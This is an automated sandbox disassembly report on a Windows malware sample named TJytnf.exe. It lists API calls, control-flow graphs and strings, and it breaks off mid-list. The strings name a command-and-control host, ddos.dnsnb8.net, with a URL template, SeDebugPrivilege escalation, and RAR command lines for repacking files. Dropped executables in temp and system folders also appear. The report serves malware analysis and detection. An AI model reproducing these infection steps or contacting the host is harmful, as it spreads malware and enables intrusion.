                          • Opcode ID: 6a3e20e094d67163ca6bb1d31a990978b9de11f2acb8afb1633d9dee2e4a093d
                          • Instruction ID: 88d590f8a4c234e545cf81f89e9ac38907ce34b9252cd2497b6c3c8947799ac6
                          • Opcode Fuzzy Hash: 6a3e20e094d67163ca6bb1d31a990978b9de11f2acb8afb1633d9dee2e4a093d
                          • Instruction Fuzzy Hash: 2E31867294031D77DB609764DC85FDA777C9B14324F088463F68DA2081DAB4DAC4BA63

                          Control-flow Graph

                          APIs
                          • GetTempPathA.KERNEL32(00000104,C:\Users\user~1\AppData\Local\Temp\,?,00000005,00000000), ref: 00F7164F
                          • GetSystemDirectoryA.KERNEL32(C:\Windows\system32,00000104), ref: 00F7165B
                          • GetModuleFileNameA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\TJytnf.exe,00000104), ref: 00F7166E
                          • CreateThread.KERNEL32(00000000,00000000,00F71099,00000000,00000000,00000000), ref: 00F716AC
                          • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000), ref: 00F716BD
                            • Part of subcall function 00F7139F: GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user~1\AppData\Local\Temp\TJytnf.exe), ref: 00F713BC
                            • Part of subcall function 00F7139F: LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 00F713DA
                            • Part of subcall function 00F7139F: GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 00F71448
                          • lstrcpy.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\TJytnf.exe), ref: 00F716E5
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.1847078742.0000000000F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F70000, based on PE: true
                          • Associated: 00000005.00000002.1847057634.0000000000F70000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.1847102783.0000000000F73000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.1847206835.0000000000F74000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.1847277915.0000000000F76000.00000040.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_f70000_TJytnf.jbxd
                          Similarity
                          • API ID: CreateCurrentDirectoryFileLookupModuleNameObjectPathPrivilegeProcessSingleSystemTempThreadValueVersionWaitlstrcpy
                          • String ID: C:\Users\user~1\AppData\Local\Temp\$C:\Users\user~1\AppData\Local\Temp\TJytnf.exe$C:\Windows\system32$Documents and Settings
                          • API String ID: 123563730-2403892175
                          • Opcode ID: 1de19b7fd6af0ca2aef027ee50dfd559337c35d19525faac144a57279cec997f
                          • Instruction ID: 2853a557a92680c767bacb6038ae3331798bb440029440c1c9c4368df9ed6556
                          • Opcode Fuzzy Hash: 1de19b7fd6af0ca2aef027ee50dfd559337c35d19525faac144a57279cec997f
                          • Instruction Fuzzy Hash: AD11B972541128BFDB215BA8AD4DE9B3E6DFB55365F008013F20D91061C7748994F7A3

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 205 f71000-f71023 CreateFileA 206 f71025-f71055 GetFileSize CreateFileMappingA MapViewOfFile 205->206 207 f71092-f71096 205->207 208 f71057-f7105f 206->208 209 f7107b-f71085 206->209 210 f71074-f71075 UnmapViewOfFile 208->210 211 f71061-f7106e call f717d0 208->211 212 f71087-f7108b CloseHandle 209->212 213 f7108d-f71091 CloseHandle 209->213 210->209 211->210 212->213 213->207
                          APIs
                          • CreateFileA.KERNEL32(00000003,C0000000,00000003,00000000,00000003,00000080,00000000,?,http://%s:%d/%s/%s,00F710E8,?), ref: 00F71018
                          • GetFileSize.KERNEL32(00000000,00000000,ddos.dnsnb8.net,75A38400,?,http://%s:%d/%s/%s,00F710E8,?), ref: 00F71029
                          • CreateFileMappingA.KERNEL32(00000000,00000000,00000004,00000000,00000000,00000000), ref: 00F71038
                          • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000,?,http://%s:%d/%s/%s,00F710E8,?), ref: 00F7104B
                          • UnmapViewOfFile.KERNEL32(00000000,?,http://%s:%d/%s/%s,00F710E8,?), ref: 00F71075
                          • CloseHandle.KERNEL32(?,?,http://%s:%d/%s/%s,00F710E8,?), ref: 00F7108B
                          • CloseHandle.KERNEL32(00000000,?,http://%s:%d/%s/%s,00F710E8,?), ref: 00F7108E
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.1847078742.0000000000F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F70000, based on PE: true
                          • Associated: 00000005.00000002.1847057634.0000000000F70000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.1847102783.0000000000F73000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.1847206835.0000000000F74000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.1847277915.0000000000F76000.00000040.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_f70000_TJytnf.jbxd
                          Similarity
                          • API ID: File$CloseCreateHandleView$MappingSizeUnmap
                          • String ID: ddos.dnsnb8.net$http://%s:%d/%s/%s
                          • API String ID: 1223616889-3273462101
                          • Opcode ID: 1323a32766672ac58c78da3d36d1b092ca27581cb34168e292feb9abd4838dab
                          • Instruction ID: 36fe812145abfd8f3fd41aa35e3d694ccd94166a215a86ac3156c1e02675af9d
                          • Opcode Fuzzy Hash: 1323a32766672ac58c78da3d36d1b092ca27581cb34168e292feb9abd4838dab
                          • Instruction Fuzzy Hash: A901447150025DBFE7305F649C88E2BBBACEB447ADF01452AF649A2190D6705E88AB62

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 374 f72c48-f72c75 memset call f71973 377 f72c77-f72c7f 374->377 378 f72cb2-f72cb9 374->378 379 f72c81-f72c8b 377->379 380 f72c8f-f72cac CreateThread WaitForMultipleObjects 377->380 381 f72cbb-f72cc2 VirtualFree 378->381 382 f72cc8-f72ccc 378->382 379->380 380->378 381->382
                          APIs
                          • memset.MSVCRT ref: 00F72C57
                            • Part of subcall function 00F71973: PathFileExistsA.SHLWAPI(00F74E5C,00000000,C:\Users\user~1\AppData\Local\Temp\TJytnf.exe), ref: 00F71992
                            • Part of subcall function 00F71973: CreateFileA.KERNEL32(00F74E5C,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 00F719BA
                            • Part of subcall function 00F71973: Sleep.KERNEL32(00000064), ref: 00F719C6
                            • Part of subcall function 00F71973: wsprintfA.USER32 ref: 00F719EC
                            • Part of subcall function 00F71973: CopyFileA.KERNEL32(00F74E5C,?,00000000), ref: 00F71A00
                            • Part of subcall function 00F71973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00F71A1E
                            • Part of subcall function 00F71973: GetFileSize.KERNEL32(00F74E5C,00000000), ref: 00F71A2C
                            • Part of subcall function 00F71973: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00F71A46
                            • Part of subcall function 00F71973: ReadFile.KERNEL32(00F74E5C,00F74E60,00000000,?,00000000), ref: 00F71A65
                          • CreateThread.KERNEL32(00000000,00000000,00F72B8C,00000000,00000000,00000000), ref: 00F72C99
                          • WaitForMultipleObjects.KERNEL32(00000001,00F716BA,00000001,000000FF,?,00F716BA,00000000), ref: 00F72CAC
                          • VirtualFree.KERNEL32(01350000,00000000,00008000,C:\Users\user~1\AppData\Local\Temp\TJytnf.exe,00F74E5C,00F74E60,?,00F716BA,00000000), ref: 00F72CC2
                          Strings
                          • C:\Users\user~1\AppData\Local\Temp\TJytnf.exe, xrefs: 00F72C69
                          Memory Dump Source
                          • Source File: 00000005.00000002.1847078742.0000000000F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F70000, based on PE: true
                          • Associated: 00000005.00000002.1847057634.0000000000F70000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.1847102783.0000000000F73000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.1847206835.0000000000F74000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.1847277915.0000000000F76000.00000040.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_f70000_TJytnf.jbxd
                          Similarity
                          • API ID: File$Create$Virtual$AllocCopyExistsFreeMultipleObjectsPathReadSizeSleepThreadWaitmemsetwsprintf
                          • String ID: C:\Users\user~1\AppData\Local\Temp\TJytnf.exe
                          • API String ID: 2042498389-2026954911
                          • Opcode ID: dc8c779951f9e9e9c3a69bb9f25e3099c24e885c7703249f3a7c4fb5f9d5040d
                          • Instruction ID: a275c8877cae0efc54bfc978d273f111d201bdf2e70c207b042cd4950efcfa70
                          • Opcode Fuzzy Hash: dc8c779951f9e9e9c3a69bb9f25e3099c24e885c7703249f3a7c4fb5f9d5040d
                          • Instruction Fuzzy Hash: D101D4716012247BD71097949C1AE9F7E6CEF11B70F008022B61CD61C1D7A0E980E3F3

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 383 f714e1-f714fb 384 f71541-f71547 383->384 385 f714fd-f71510 GetModuleHandleA 383->385 388 f71573-f71574 call f71638 384->388 389 f71549-f7154c 384->389 386 f71512-f71518 385->386 387 f7151a-f71535 VirtualQuery 385->387 386->384 391 f71537-f71539 387->391 392 f7153b 387->392 395 f71579-f7157a ExitProcess 388->395 393 f7154e-f71555 389->393 394 f71569-f71570 389->394 391->384 391->392 392->384 393->394 396 f71557-f71566 call f71af9 393->396 396->394
                          APIs
                          • GetModuleHandleA.KERNEL32(00000000), ref: 00F71504
                          • VirtualQuery.KERNEL32(00F714E1,?,0000001C), ref: 00F71525
                          • ExitProcess.KERNEL32 ref: 00F7157A
                          Memory Dump Source
                          • Source File: 00000005.00000002.1847078742.0000000000F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F70000, based on PE: true
                          • Associated: 00000005.00000002.1847057634.0000000000F70000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.1847102783.0000000000F73000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.1847206835.0000000000F74000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.1847277915.0000000000F76000.00000040.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_f70000_TJytnf.jbxd
                          Similarity
                          • API ID: ExitHandleModuleProcessQueryVirtual
                          • String ID:
                          • API String ID: 3946701194-0
                          • Opcode ID: b30f4b2823182ff1ccc2c3d9952353859b84c1c37f78aeba583a88263829c7f5
                          • Instruction ID: 2a9f7fb6c43b00a6cd30e2d12b84c169f87cfcb05d8e801ce11f4687aedcdb70
                          • Opcode Fuzzy Hash: b30f4b2823182ff1ccc2c3d9952353859b84c1c37f78aeba583a88263829c7f5
                          • Instruction Fuzzy Hash: 74115171D40208EFDB20DF69AC8567977BCF784724B14802BF84AD2250D334A995BB53

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 399 f71915-f71922 400 f71924-f71926 399->400 401 f71928-f7192c 399->401 402 f7196e-f71970 400->402 403 f7194f-f71952 401->403 404 f7192e-f7194d memset GetFileTime 401->404 403->402 405 f71954-f71960 SetFileTime 403->405 406 f71966-f71968 404->406 405->406 407 f7196c 406->407 408 f7196a 406->408 407->402 408->407
                          APIs
                          Memory Dump Source
                          • Source File: 00000005.00000002.1847078742.0000000000F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F70000, based on PE: true
                          • Associated: 00000005.00000002.1847057634.0000000000F70000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.1847102783.0000000000F73000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.1847206835.0000000000F74000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.1847277915.0000000000F76000.00000040.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_f70000_TJytnf.jbxd
                          Similarity
                          • API ID: FileTimememset
                          • String ID:
                          • API String ID: 176422537-0
                          • Opcode ID: bfc63317ad88ac2e50b9604f644217e920e0f604ea8709704d1ae34a26e2bf40
                          • Instruction ID: e7120622e7baaf8df5773af39e7d06dadaeb9ffae7e5779c4586e0f5927c15f3
                          • Opcode Fuzzy Hash: bfc63317ad88ac2e50b9604f644217e920e0f604ea8709704d1ae34a26e2bf40
                          • Instruction Fuzzy Hash: 93F04432600209BBD7209E2ADC04BA777BDBB50365F00C537F65ED1050E730D64AEBA2

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 409 f7615d-f76189 VirtualFree 410 f7618c-f76192 409->410 411 f760c7-f760cf 410->411 412 f76198-f761b0 VirtualFree 410->412 411->410 413 f760d5-f760f8 VirtualAlloc 411->413 414 f761b2-f761b4 412->414 415 f761ba-f761c8 412->415 435 f760fe-f76106 413->435 436 f760fa-f760fc call f766c8 413->436 414->415 416 f76243-f76251 415->416 417 f761ca-f761d7 415->417 421 f76264-f7626f 416->421 422 f76253 416->422 419 f761dd-f761e0 417->419 419->416 424 f761e2-f761f2 419->424 423 f76271-f76276 421->423 426 f76255-f76258 422->426 428 f7627c-f76289 423->428 429 f76389-f763b1 VirtualProtect 423->429 430 f761f5-f761fe 424->430 426->421 427 f7625a-f76262 426->427 427->426 448 f76292-f76298 428->448 449 f7628b 428->449 434 f763b7-f763ba 429->434 432 f76200-f76203 430->432 433 f7620c-f76219 430->433 440 f76205-f76208 432->440 441 f7621b-f76228 432->441 442 f76238-f7623f 433->442 443 f763fc-f763ff VirtualProtect 434->443 444 f763bc-f763c2 434->444 437 f76155-f76189 VirtualFree 435->437 438 f76108-f7611d 435->438 436->435 437->410 446 f7611f-f76121 438->446 450 f7622a-f76236 440->450 451 f7620a 440->451 441->442 442->430 454 f76241 442->454 447 f76400-f76416 443->447 444->444 452 f763c4 444->452 455 f76123 446->455 456 f76151-f76154 446->456 457 f76420-f76425 447->457 458 f76418-f7641d 447->458 459 f762a2-f762ac 448->459 449->448 450->442 451->442 452->443 460 f763c6-f763cf 452->460 454->419 455->456 461 f76125-f76128 455->461 456->437 462 f762b1-f762c8 459->462 463 f762ae 459->463 464 f763d4-f763d8 460->464 465 f763d1 460->465 466 f76134-f7613b 461->466 467 f7612a-f7612e 461->467 468 f76373-f76384 462->468 469 f762ce-f762d4 462->469 463->462 470 f763dd-f763e1 464->470 471 f763da 464->471 465->464 478 f76130-f76132 466->478 479 f7613d-f7614f 466->479 467->466 467->478 468->423 476 f762d6-f762d9 469->476 477 f762da-f762f1 469->477 472 f763e7-f763fa VirtualProtect 470->472 473 f763e3 470->473 471->470 472->434 472->443 473->472 476->477 481 f76365-f7636e 477->481 482 f762f3-f762f9 477->482 478->446 479->446 481->459 483 f76314-f76326 482->483 484 f762fb-f7630f 482->484 486 f7634c-f76360 483->486 487 f76328-f7634a 483->487 485 f76426-f764c0 484->485 496 f76535-f76537 485->496 497 f764c2 485->497 486->485 487->481 498 f7659a 496->498 499 f76539 496->499 500 f764c5-f764cd 497->500 501 f764f8 497->501 504 f7659b-f7659d 498->504 502 f765b4 499->502 503 f7653b-f76541 499->503 505 f76542-f76545 500->505 506 f764cf-f764d4 500->506 507 f7656c-f7656f 501->507 508 f764fa-f764fe 501->508 514 f765be-f765db 502->514 503->505 509 f76591-f76593 504->509 510 f7659f 504->510 511 f7654d-f76550 505->511 512 f76517-f7651c 506->512 513 f764d6-f764d9 506->513 515 f76572 507->515 508->515 516 f76500 508->516 509->504 519 f76595 509->519 520 f76588-f7658b 510->520 511->514 521 f76552-f76556 511->521 517 f76583-f76587 512->517 518 f7651d-f7651e 512->518 513->511 522 f764db-f764f5 513->522 531 f765dd-f765f6 514->531 524 f76573-f76576 515->524 525 f76522-f76533 516->525 526 f76502 516->526 517->520 518->525 519->498 527 f765a1-f765a3 520->527 528 f7658d-f7658f 520->528 529 f76578-f7657a 521->529 530 f76558-f76569 521->530 522->501 524->529 525->496 526->524 532 f76504-f76513 526->532 528->509 529->531 535 f7657c 529->535 530->507 534 f765f7-f76608 531->534 532->496 533 f76515 532->533 533->512 535->534 536 f7657e-f7657f 535->536 536->517
                          APIs
                          • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?), ref: 00F760DF
                          • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 00F76189
                          • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00F761A5
                          Memory Dump Source
                          • Source File: 00000005.00000002.1847277915.0000000000F76000.00000040.00000001.01000000.00000004.sdmp, Offset: 00F70000, based on PE: true
                          • Associated: 00000005.00000002.1847057634.0000000000F70000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.1847078742.0000000000F71000.00000020.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.1847102783.0000000000F73000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.1847206835.0000000000F74000.00000004.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_f70000_TJytnf.jbxd
                          Similarity
                          • API ID: Virtual$Free$Alloc
                          • String ID:
                          • API String ID: 1852963964-0
                          • Opcode ID: 2c89c0d4c07887ec9144e1f2f4c42164e871db1d9a3d4648a870348dafa0d5ea
                          • Instruction ID: 56ec7a237de466ff92c3d53d67a3e79835635ad010f9f3f896d379af4d637475
                          • Opcode Fuzzy Hash: 2c89c0d4c07887ec9144e1f2f4c42164e871db1d9a3d4648a870348dafa0d5ea
                          • Instruction Fuzzy Hash: B311BF32A00A48CFCF718E58CC853DD37A1FF04310F69801ADE4D9B252DA712940DB85
                          APIs
                          • GetCurrentProcess.KERNEL32(C:\Users\user~1\AppData\Local\Temp\TJytnf.exe,?,?,?,?,?,?,00F713EF), ref: 00F711AB
                          • OpenProcessToken.ADVAPI32(00000000,00000028,00F713EF,?,?,?,?,?,?,00F713EF), ref: 00F711BB
                          • AdjustTokenPrivileges.ADVAPI32(00F713EF,00000000,?,00000010,00000000,00000000), ref: 00F711EB
                          • CloseHandle.KERNEL32(00F713EF), ref: 00F711FA
                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,00F713EF), ref: 00F71203
                          Strings
                          • C:\Users\user~1\AppData\Local\Temp\TJytnf.exe, xrefs: 00F711A5
                          Memory Dump Source
                          • Source File: 00000005.00000002.1847078742.0000000000F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F70000, based on PE: true
                          • Associated: 00000005.00000002.1847057634.0000000000F70000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.1847102783.0000000000F73000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.1847206835.0000000000F74000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.1847277915.0000000000F76000.00000040.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_f70000_TJytnf.jbxd
                          Similarity
                          • API ID: CloseHandleProcessToken$AdjustCurrentOpenPrivileges
                          • String ID: C:\Users\user~1\AppData\Local\Temp\TJytnf.exe
                          • API String ID: 75692138-2026954911
                          • Opcode ID: 6aba40e7ce2d4744a71ffefc6e7c04212951ede9235829054106a99ddb9e506f
                          • Instruction ID: 0c71a9da62d6e47374f912b062b9e674944a8c4c88fa1e4311d4c706d7992531
                          • Opcode Fuzzy Hash: 6aba40e7ce2d4744a71ffefc6e7c04212951ede9235829054106a99ddb9e506f
                          • Instruction Fuzzy Hash: EC01E87590020DFFDB00DFD4CD89AAEBBB8FB04309F104469E609A2151D7715F84AB51
                          APIs
                          • GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user~1\AppData\Local\Temp\TJytnf.exe), ref: 00F713BC
                          • LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 00F713DA
                          • GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 00F71448
                            • Part of subcall function 00F7119F: GetCurrentProcess.KERNEL32(C:\Users\user~1\AppData\Local\Temp\TJytnf.exe,?,?,?,?,?,?,00F713EF), ref: 00F711AB
                            • Part of subcall function 00F7119F: OpenProcessToken.ADVAPI32(00000000,00000028,00F713EF,?,?,?,?,?,?,00F713EF), ref: 00F711BB
                            • Part of subcall function 00F7119F: AdjustTokenPrivileges.ADVAPI32(00F713EF,00000000,?,00000010,00000000,00000000), ref: 00F711EB
                            • Part of subcall function 00F7119F: CloseHandle.KERNEL32(00F713EF), ref: 00F711FA
                            • Part of subcall function 00F7119F: CloseHandle.KERNEL32(?,?,?,?,?,?,?,00F713EF), ref: 00F71203
                          Strings
                          • C:\Users\user~1\AppData\Local\Temp\TJytnf.exe, xrefs: 00F713A8
                          • SeDebugPrivilege, xrefs: 00F713D3
                          Memory Dump Source
                          • Source File: 00000005.00000002.1847078742.0000000000F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F70000, based on PE: true
                          • Associated: 00000005.00000002.1847057634.0000000000F70000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.1847102783.0000000000F73000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.1847206835.0000000000F74000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.1847277915.0000000000F76000.00000040.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_f70000_TJytnf.jbxd
                          Similarity
                          • API ID: Process$CloseCurrentHandleToken$AdjustLookupOpenPrivilegePrivilegesValueVersion
                          • String ID: C:\Users\user~1\AppData\Local\Temp\TJytnf.exe$SeDebugPrivilege
                          • API String ID: 4123949106-3281114557
                          • Opcode ID: a850a4848267a1d77716f4130a93c004ce875276418c8f2c7c49cd500addbd3a
                          • Instruction ID: 033af06fedf2a8fddcca4fc6aeaa8505f3c8875edd6b7d343771c861e348b043
                          • Opcode Fuzzy Hash: a850a4848267a1d77716f4130a93c004ce875276418c8f2c7c49cd500addbd3a
                          • Instruction Fuzzy Hash: DA316472D0020DAAEF60DFA99C45FDE7B78FB45714F10806BE608B2141D6745E49EB62
                          APIs
                          • strstr.MSVCRT ref: 00F723CC
                          • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00F72464
                          • GetFileSize.KERNEL32(00000000,00000000), ref: 00F72472
                          • CloseHandle.KERNEL32(?,00000000,00000000), ref: 00F724A8
                          • memset.MSVCRT ref: 00F724B9
                          • strrchr.MSVCRT ref: 00F724C9
                          • wsprintfA.USER32 ref: 00F724DE
                          • strrchr.MSVCRT ref: 00F724ED
                          • memset.MSVCRT ref: 00F724F2
                          • memset.MSVCRT ref: 00F72505
                          • wsprintfA.USER32 ref: 00F72524
                          • Sleep.KERNEL32(000007D0), ref: 00F72535
                          • Sleep.KERNEL32(000007D0), ref: 00F7255D
                          • memset.MSVCRT ref: 00F7256E
                          • wsprintfA.USER32 ref: 00F72585
                          • memset.MSVCRT ref: 00F725A6
                          • wsprintfA.USER32 ref: 00F725CA
                          • Sleep.KERNEL32(000007D0), ref: 00F725D0
                          • Sleep.KERNEL32(000007D0,?,?), ref: 00F725E5
                          • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00F725FC
                          • CloseHandle.KERNEL32(00000000,00000000,00000001), ref: 00F72611
                          • SetFilePointer.KERNEL32(FFFFFFFF,?,00000000,00000000), ref: 00F72642
                          • WriteFile.KERNEL32(?,00000006,?,00000000), ref: 00F7265B
                          • SetEndOfFile.KERNEL32 ref: 00F7266D
                          • CloseHandle.KERNEL32(00000000), ref: 00F72676
                          • RemoveDirectoryA.KERNEL32(?), ref: 00F72681
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.1847078742.0000000000F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F70000, based on PE: true
                          • Associated: 00000005.00000002.1847057634.0000000000F70000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.1847102783.0000000000F73000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.1847206835.0000000000F74000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.1847277915.0000000000F76000.00000040.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_f70000_TJytnf.jbxd
                          Similarity
                          • API ID: File$memset$Sleepwsprintf$CloseHandle$Createstrrchr$DirectoryPointerRemoveSizeWritestrstr
                          • String ID: %s M %s -r -o+ -ep1 "%s" "%s\*"$%s X -ibck "%s" "%s\"$%s%s$%s\$-ibck$C:\Users\user~1\AppData\Local\Temp\
                          • API String ID: 2203340711-1252250577
                          • Opcode ID: eae0302bc899303565b9d05bc27dae53f0b64cd147eb6b96ced05e03939ca9fa
                          • Instruction ID: c31b621b4a2a63149bf94af31c64903fd0332c99ab7f3852e0f65b0d84d9f2d2
                          • Opcode Fuzzy Hash: eae0302bc899303565b9d05bc27dae53f0b64cd147eb6b96ced05e03939ca9fa
                          • Instruction Fuzzy Hash: CD818FB1504348BBD710DF64DC89EABB7ACFB88714F00851BF688D2190D774DA89AB67
                          APIs
                          • memset.MSVCRT ref: 00F72766
                          • memset.MSVCRT ref: 00F72774
                          • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000026,00000000), ref: 00F72787
                          • wsprintfA.USER32 ref: 00F727AB
                            • Part of subcall function 00F7185B: GetSystemTimeAsFileTime.KERNEL32(00F71F92,00000000,?,00000000,?,?,?,00F71F92,?,00000000,00000002), ref: 00F71867
                            • Part of subcall function 00F7185B: srand.MSVCRT ref: 00F71878
                            • Part of subcall function 00F7185B: rand.MSVCRT ref: 00F71880
                            • Part of subcall function 00F7185B: srand.MSVCRT ref: 00F71890
                            • Part of subcall function 00F7185B: rand.MSVCRT ref: 00F71894
                          • wsprintfA.USER32 ref: 00F727C6
                          • CopyFileA.KERNEL32(?,00F74C80,00000000), ref: 00F727D4
                          • wsprintfA.USER32 ref: 00F727F4
                            • Part of subcall function 00F71973: PathFileExistsA.SHLWAPI(00F74E5C,00000000,C:\Users\user~1\AppData\Local\Temp\TJytnf.exe), ref: 00F71992
                            • Part of subcall function 00F71973: CreateFileA.KERNEL32(00F74E5C,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 00F719BA
                            • Part of subcall function 00F71973: Sleep.KERNEL32(00000064), ref: 00F719C6
                            • Part of subcall function 00F71973: wsprintfA.USER32 ref: 00F719EC
                            • Part of subcall function 00F71973: CopyFileA.KERNEL32(00F74E5C,?,00000000), ref: 00F71A00
                            • Part of subcall function 00F71973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00F71A1E
                            • Part of subcall function 00F71973: GetFileSize.KERNEL32(00F74E5C,00000000), ref: 00F71A2C
                            • Part of subcall function 00F71973: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00F71A46
                            • Part of subcall function 00F71973: ReadFile.KERNEL32(00F74E5C,00F74E60,00000000,?,00000000), ref: 00F71A65
                          • DeleteFileA.KERNEL32(?,?,00F74E54,00F74E58), ref: 00F7281A
                          • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000000,00000000,?,00F74E54,00F74E58), ref: 00F72832
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.1847078742.0000000000F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F70000, based on PE: true
                          • Associated: 00000005.00000002.1847057634.0000000000F70000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.1847102783.0000000000F73000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.1847206835.0000000000F74000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.1847277915.0000000000F76000.00000040.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_f70000_TJytnf.jbxd
                          Similarity
                          • API ID: File$wsprintf$Create$CopyPathTimememsetrandsrand$AllocDeleteExistsFolderReadSizeSleepSpecialSystemVirtual
                          • String ID: %s%.8x.exe$%s%s$%s\%s$C:\Users\user~1\AppData\Local\Temp\$C:\Windows\system32$\WinRAR\Rar.exe$c_31892.nls
                          • API String ID: 692489704-4282063453
                          • Opcode ID: a3d0564127ac7ee85256db81c9fa5438cccefbcd5c68a5c41033f19d3fa11cc0
                          • Instruction ID: c723e8fd98957b4f63aa17dff0542b390b9280e6a519889d6f1b013a30df4889
                          • Opcode Fuzzy Hash: a3d0564127ac7ee85256db81c9fa5438cccefbcd5c68a5c41033f19d3fa11cc0
                          • Instruction Fuzzy Hash: 612165B6D4021C7BEB10E7A49C89FDB736CEB14754F0045A3B65CE2052E674EF84AA63
                          APIs
                            • Part of subcall function 00F7185B: GetSystemTimeAsFileTime.KERNEL32(00F71F92,00000000,?,00000000,?,?,?,00F71F92,?,00000000,00000002), ref: 00F71867
                            • Part of subcall function 00F7185B: srand.MSVCRT ref: 00F71878
                            • Part of subcall function 00F7185B: rand.MSVCRT ref: 00F71880
                            • Part of subcall function 00F7185B: srand.MSVCRT ref: 00F71890
